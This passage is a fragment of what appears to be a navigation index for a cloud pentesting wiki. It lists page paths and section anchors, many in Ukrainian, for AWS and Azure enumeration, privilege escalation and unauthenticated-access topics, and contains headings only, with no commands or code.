route53-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-route53-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#aws---secrets-manager-enum","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#aws-secrets-manager","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#Привілегії","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#Після-експлуатації","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#Постійність","pentesting-cloud/aws-security/aws-services/aws-ses-enum.html#aws---ses-enum","pentesting-cloud/aws-security/aws-services/aws-ses-enum.html#Основна-інформація","pentesting-cloud/aws-security/aws-services/aws-ses-enum.html#smtp-Користувач","pentesting-cloud/aws-security/aws-services/aws-ses-enum.html#Перерахування","pentesting-cloud/aws-security/aws-services/aws-ses-enum.html#Після-експлуатації","pentesting-cloud/aws-security/aws-services/aws-sns-enum.html#aws---sns-enum","pentesting-cloud/aws-security/aws-services/aws-sns-enum.html#sns","pentesting-cloud/aws-security/aws-services/aws-sns-enum.html#Різниця-з-sqs","pentesting-cloud/aws-security/aws-services/aws-sns-enum.html#Перерахування","pentesting-cloud/aws-security/aws-services/aws-sns-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.html#aws---sqs-enum","pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.html#sqs","pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#aws---s3-athena--glacier-enum","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#s3","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#Версійність-бакетів-та-видалення-на-основі-mfa","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#Журнали-доступу-s3","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#Пресигновані-url-адреси-s3","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#s3-encryption-mechanisms","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#Перерахування","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#dual-stack","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#s3-post-exploitation","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#Інші-вразливості-s3","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#Проблема-отруєння-кешу-http-s3","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#amazon-athena","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#Посилання","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#aws---step-functions-enum","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#step-functions","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#key-concepts","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#standard-vs-express-workflows","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#states","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#task","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#Вибір","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#failsucceed","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#pass","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#wait","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#parallel","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#map","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#versions-and-aliases","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#iam-roles-for-state-machines","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#aws---sts-enum","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#sts","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#assume-role-impersonation","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-other-services-enum.html#aws---Інші-сервіси","pentesting-cloud/aws-security/aws-services/aws-other-services-enum.html#directconnect","pentesting-cloud/aws-security/aws-services/aws-other-services-enum.html#Підтримка","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/index.html#aws---Неавтентифікований-enum-та-Доступ","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/index.html#Витоки-aws-Кредитів","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/index.html#aws-Неавтентифікований-enum-та-Доступ","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/index.html#Атаки-Між-Обліковими-Записами","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/index.html#Інструменти","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#aws---Облікові-записи-без-аутентифікації","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#Ідентифікатори-облікових-записів","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#Брутфорс","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#osint","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#marketplace","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#snapshots","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#errors","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#references","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.html#aws---api-gateway-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.html#api-invoke-bypass","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.html#Впровадження-iam-політики","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.html#Шаблон-публічного-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.html#Отримання-id-облікового-запису-з-публічного-url-api-gateway","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.html#aws---cloudfront-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.html#Шаблон-публічного-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html#aws---cognito-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html#unauthenticated-cognito","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html#identity-pool-id","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html#user-pool-id","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html#pacu-modules-for-pentesting-and-enumeration","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.html#aws---codebuild-Неавтентифікований-Доступ","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.html#codebuild","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.html#buildspecyml","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.html#aws---documentdb-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.html#Шаблон-публічного-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.html#aws---Доступ-до-dynamodb-без-аутентифікації","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.html#dynamo-db","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.html#aws---ec2-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.html#ec2-та-повязані-сервіси","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.html#Публічні-порти","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.html#Публічні-ami-та-знімки-ebs","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.html#Перерахунок-ec2-інстансів-з-публічним-ip","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.html#aws---ecr-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.html#ecr","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.html#Публічні-репозиторії-реєстру-зображення","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.html#Перерахунок-приватного-репозиторію","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.html#aws---ecs-Універсальний-Перелік-Без-Аутентифікації","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.html#ecs","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.html#Публічно-Доступна-Група-Безпеки-або-Балансувальник-Навантаження-для-ecs-Сервісів","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#aws---elastic-beanstalk-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#elastic-beanstalk","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#Веб-вразливість","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#Небезпечні-правила-групи-безпеки","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#Публічно-доступний-балансувальник-навантаження","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#Публічно-доступні-s3-бакети","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#Перерахунок-публічних-середовищ","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.html#aws---elasticsearch-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.html#Шаблон-публічного-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#aws---iam--sts-Універсальна-Перевірка","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#Перерахунок-ролей-та-імен-користувачів-в-обліковому-записі","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#Брутфорс-для-припущення-ролі","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#Політики-довіри-Брутфорс-крос-облікові-ролі-та-користувачі","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#privesc","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#Федерація-oidc-третьої-сторони","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#Посилання","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#aws---identity-center--sso-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#aws-device-code-phishing","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#attack","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#Фішинг-непіддатливого-mfa","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#Автоматичні-інструменти","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#Посилання","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.html#aws---iot-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.html#Шаблон-публічного-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.html#aws---kinesis-video-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.html#Шаблон-публічного-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.html#aws---lambda-unauthenticated-access","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.html#Публічний-url-функції","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.html#Шаблон-публічного-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.html#Отримання-id-облікового-запису-з-публічного-url-lambda","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.html#aws---media-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.html#Шаблон-публічного-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.html#aws---mq-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.html#Публічний-порт","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.html#rabbitmq","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.html#activemq","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.html#Шаблон-публічного-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.html#aws---msk-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.html#Публічний-порт","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.html#Шаблон-публічного-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.html#aws---rds-Університетська-Перевірка","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.html#rds","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.html#Публічний-Порт","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.html#Публічні-Знімки-rds","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.html#Шаблон-публічного-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.html#aws---redshift-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.html#Шаблон-публічного-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.html#aws---sqs-Неавтентифікований-Перелік","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.html#sqs","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.html#Публічний-шаблон-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.html#Перевірка-дозволів","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.html#aws---sns-Неавтентифіковане-Перерахування","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.html#sns","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.html#Відкрито-для-всіх","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#aws---s3-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#s3-Публічні-Бакети","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#Пошук-aws-Бакетів","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#Знайти-Регіон","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#Перерахування-бакету","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#Шаблон-публічного-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#Отримання-ідентифікатора-облікового-запису-з-публічного-бакету","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#Підтвердження-що-бакет-належить-обліковому-запису-aws","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#Використані-електронні-адреси-для-перерахунку-облікових-записів-root","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#Посилання","pentesting-cloud/azure-security/index.html#azure-pentesting","pentesting-cloud/azure-security/index.html#Основна-інформація","pentesting-cloud/azure-security/index.html#Методологія-azure-pentesterred-team","pentesting-cloud/azure-security/index.html#Зовнішня-енумерація-та-початковий-доступ","pentesting-cloud/azure-security/index.html#Інструменти-azure-та-entra-id","pentesting-cloud/azure-security/index.html#Обхід-політик-доступу","pentesting-cloud/azure-security/index.html#whoami","pentesting-cloud/azure-security/index.html#entra-id-enumeration--privesc","pentesting-cloud/azure-security/index.html#azure-enumeration","pentesting-cloud/azure-security/index.html#Підвищення-привілеїв-пост-експлуатація-та-збереження","pentesting-cloud/azure-security/az-basic-information/index.html#az---Основна-інформація","pentesting-cloud/azure-security/az-basic-information/index.html#Ієрархія-організації","pentesting-cloud/azure-security/az-basic-information/index.html#Групи-управління","pentesting-cloud/azure-security/az-basic-information/index.html#azure-Підписки","pentesting-cloud/azure-security/az-basic-information/index.html#Групи-ресурсів","pentesting-cloud/azure-security/az-basic-information/index.html#azure-resource-ids","pentesting-cloud/azure-security/az-basic-information/index.html#azure-vs-entra-id-vs-azure-ad-domain-services","pentesting-cloud/azure-security/az-basic-information/index.html#azure","pentesting-cloud/azure-security/az-basic-information/index.html#entra-id-раніше-azure-active-directory","pentesting-cloud/azure-security/az-basic-information/index.html#entra-domain-services-раніше-azure-ad-ds","pentesting-cloud/azure-security/az-basic-information/index.html#Принципи-entra-id","pentesting-cloud/azure-security/az-basic-information/index.html#Користувачі","pentesting-cloud/azure-security/az-basic-information/index.html#Дефолтні-дозволи-для-членів-та-гостей","pentesting-cloud/azure-security/az-basic-information/index.html#Дефолтні-налаштовувані-дозволи-для-користувачів","pentesting-cloud/azure-security/az-basic-information/index.html#Групи","pentesting-cloud/azure-security/az-basic-information/index.html#Службові-принципали","pentesting-cloud/azure-security/az-basic-information/index.html#Реєстрації-додатків","pentesting-cloud/azure-security/az-basic-information/index.html#Дефолтні-дозволи-згоди","pentesting-cloud/azure-security/az-basic-information/index.html#Керована-ідентичність-Метадані","pentesting-cloud/azure-security/az-basic-information/index.html#Підприємницькі-додатки","pentesting-cloud/azure-security/az-basic-information/index.html#Адміністративні-одиниці","pentesting-cloud/azure-security/az-basic-information/index.html#Ролі-та-дозволи-entra-id","pentesting-cloud/azure-security/az-basic-information/index.html#Ролі-та-дозволи-azure","pentesting-cloud/azure-security/az-basic-information/index.html#Вбудовані-ролі","pentesting-cloud/azure-security/az-basic-information/index.html#Користувацькі-ролі","pentesting-cloud/azure-security/az-basic-information/index.html#permissions-order","pentesting-cloud/azure-security/az-basic-information/index.html#global-administrator","pentesting-cloud/azure-security/az-basic-information/index.html#assignments-conditions--mfa","pentesting-cloud/azure-security/az-basic-information/index.html#deny-assignments","pentesting-cloud/azure-security/az-basic-information/index.html#azure-policies","pentesting-cloud/azure-security/az-basic-information/index.html#Спадкування-дозволів","pentesting-cloud/azure-security/az-basic-information/index.html#azure-rbac-проти-abac","pentesting-cloud/azure-security/az-basic-information/index.html#Посилання","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#az---Токени-та-Публічні-Додатки","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#Основна-Інформація","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#oauth","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#Токени-Аутентифікації","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#Токени-Доступу-aud","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#Обсяги-Токенів-Доступу-scp","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#Приклад-отримання-токена-оновлення-та-доступу","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#Інші-поля-токена-доступу","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#Підвищення-привілеїв-токенів-foci","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#Отримати-іншу-область","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#Отримати-різні-клієнти-та-області","pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.html#Посилання","pentesting-cloud/azure-security/az-enumeration-tools.html#az---enumeration-tools","pentesting-cloud/azure-security/az-enumeration-tools.html#Встановлення-powershell-в-linux","pentesting-cloud/azure-security/az-enumeration-tools.html#Встановлення-powershell-на-macos","pentesting-cloud/azure-security/az-enumeration-tools.html#Основні-інструменти-для-перерахунку","pentesting-cloud/azure-security/az-enumeration-tools.html#az-cli","pentesting-cloud/azure-security/az-enumeration-tools.html#az-powershell","pentesting-cloud/azure-security/az-enumeration-tools.html#microsoft-graph-powershell","pentesting-cloud/azure-security/az-enumeration-tools.html#azuread-powershell","pentesting-cloud/azure-security/az-enumeration-tools.html#Автоматизовані-інструменти-розвідки-та-відповідності","pentesting-cloud/azure-security/az-enumeration-tools.html#turbot-azure-plugins","pentesting-cloud/azure-security/az-enumeration-tools.html#prowler","pentesting-cloud/azure-security/az-enumeration-tools.html#monkey365","pentesting-cloud/azure-security/az-enumeration-tools.html#scoutsuite","pentesting-cloud/azure-security/az-enumeration-tools.html#azure-mg-sub-governance-reporting","pentesting-cloud/azure-security/az-enumeration-tools.html#Автоматизовані-інструменти-пост-експлуатації","pentesting-cloud/azure-security/az-enumeration-tools.html#roadrecon","pentesting-cloud/azure-security/az-enumeration-tools.html#azurehound","pentesting-cloud/azure-security/az-enumeration-tools.html#microburst","pentesting-cloud/azure-security/az-enumeration-tools.html#powerzure","pentesting-cloud/azure-security/az-enumeration-tools.html#graphrunner","pentesting-cloud/azure-security/az-enumeration-tools.html#stormspotter","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#az---unauthenticated-enum--initial-entry","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#azure-tenant","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#tenant-enumeration","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#Перерахування-Користувачів","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#password-spraying--brute-force","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#azure-services-using-domains","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#Фішинг","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#Облікові-дані-файлової-системи","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/index.html#Посилання","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-container-registry-unauth.html#az---container-registry-unauth","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-container-registry-unauth.html#container-registry-unauth","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-container-registry-unauth.html#Анонімний-доступ-до-завантаження","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#az---oauth-apps-phishing","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#oauth-app-phishing","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#Дозволи-на-згоду-застосунків","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#2-Типи-атак","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#Користувачі-можуть-надавати-згоду","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#Адміністратори-додатків","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#Огляд-потоку-атаки","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#Приклад-атаки","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#Інші-інструменти","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#Пост-експлуатація","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#Фішинг-Пост-експлуатація","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#entra-id-Додатки-Адміністратор","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#Додаток-Пост-Експлуатація","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.html#Посилання","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-storage-unauth.html#az---storage-unauth","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-storage-unauth.html#storage-unauth","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-storage-unauth.html#open-storage","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-storage-unauth.html#sas-urls","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unauth.html#az---vms-unauth","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unauth.html#Віртуальні-машини","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unauth.html#Вразлива-відкрита-служба","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unauth.html#Публічні-зображення-галереї","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unauth.html#Публічні-розширення","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.html#az---Фішинг-за-допомогою-автентифікації-коду-пристрою","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.html#az---password-spraying","pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.html#password-spray","pentesting-cloud/azure-security/az-services/index.html#az---services","pentesting-cloud/azure-security/az-services/index.html#portals","pentesting-cloud/azure-security/az-services/index.html#raw-requests","pentesting-cloud/azure-security/az-services/index.html#Список-послуг","pentesting-cloud/azure-security/az-services/az-azuread.html#az---entra-id-azuread--azure-iam","pentesting-cloud/azure-security/az-services/az-azuread.html#Основна-інформація","pentesting-cloud/azure-security/az-services/az-azuread.html#Перерахування","pentesting-cloud/azure-security/az-services/az-azuread.html#Зєднання","pentesting-cloud/azure-security/az-services/az-azuread.html#Тенанти","pentesting-cloud/azure-security/az-services/az-azuread.html#Користувачі","pentesting-cloud/azure-security/az-services/az-azuread.html#mfa--conditional-access-policies","pentesting-cloud/azure-security/az-services/az-azuread.html#groups","pentesting-cloud/azure-security/az-services/az-azuread.html#Службові-принципали","pentesting-cloud/azure